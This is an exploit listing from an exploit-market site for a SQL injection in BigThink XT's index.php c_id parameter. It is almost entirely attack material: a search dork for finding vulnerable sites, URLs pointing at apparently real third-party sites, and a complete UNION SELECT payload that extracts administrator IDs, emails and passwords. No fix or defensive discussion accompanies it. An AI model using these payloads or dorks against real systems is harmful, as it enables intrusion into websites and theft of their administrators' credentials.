[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BigThink XT (index.php) SQL Injection Vulnerability

Author
SIL3NCIO
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13323
Category
web applications
Date add
13-07-2010
Platform
php
===================================================
BigThink XT (index.php) SQL Injection Vulnerability
===================================================


 ____    ______   __          __    __  __  ____    ______   _____      
/\  _`\ /\__  _\ /\ \       /'__`\ /\ \/\ \/\  _`\ /\__  _\ /\  __`\    
\ \,\L\_\/_/\ \/ \ \ \     /\_\L\ \\ \ `\\ \ \ \/\_\/_/\ \/ \ \ \/\ \   
 \/_\__ \  \ \ \  \ \ \  __\/_/_\_<_\ \ , ` \ \ \/_/_ \ \ \  \ \ \ \ \  
   /\ \L\ \ \_\ \__\ \ \L\ \ /\ \L\ \\ \ \`\ \ \ \L\ \ \_\ \__\ \ \_\ \ 
   \ `\____\/\_____\\ \____/ \ \____/ \ \_\ \_\ \____/ /\_____\\ \_____\
    \/_____/\/_____/ \/___/   \/___/   \/_/\/_/\/___/  \/_____/ \/_____/
                                                                        



# Exploit Title :    BigThink XT (index.php) SQL Injection Vulnerability

# Date          :    July 13  2010

# Author        :    SIL3NCIO

# Email         :    617a6572@gmail.com

# Tested on     :    Win Xp Sp3

# Dork          :    "Powered by: BigThink XT"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Exploit] :  http://site.com/path/index.php?c_id=[SQLi]

[Demo] :  http://www.nlh2010.com/index.php?c_id=[SQLi]

[Liv3] : http://bigthinkxt.com/index.php?c_id=-192+union+select+1,2,3,group_concat(0x2525,admin_id,0x3a,admin_email,0x3a,admin_password,0x2525),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+rbac0_admin--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note : Proud to be Tunisian 

[wrass la7nina sa7li]




#  0day.today [2024-12-24]  #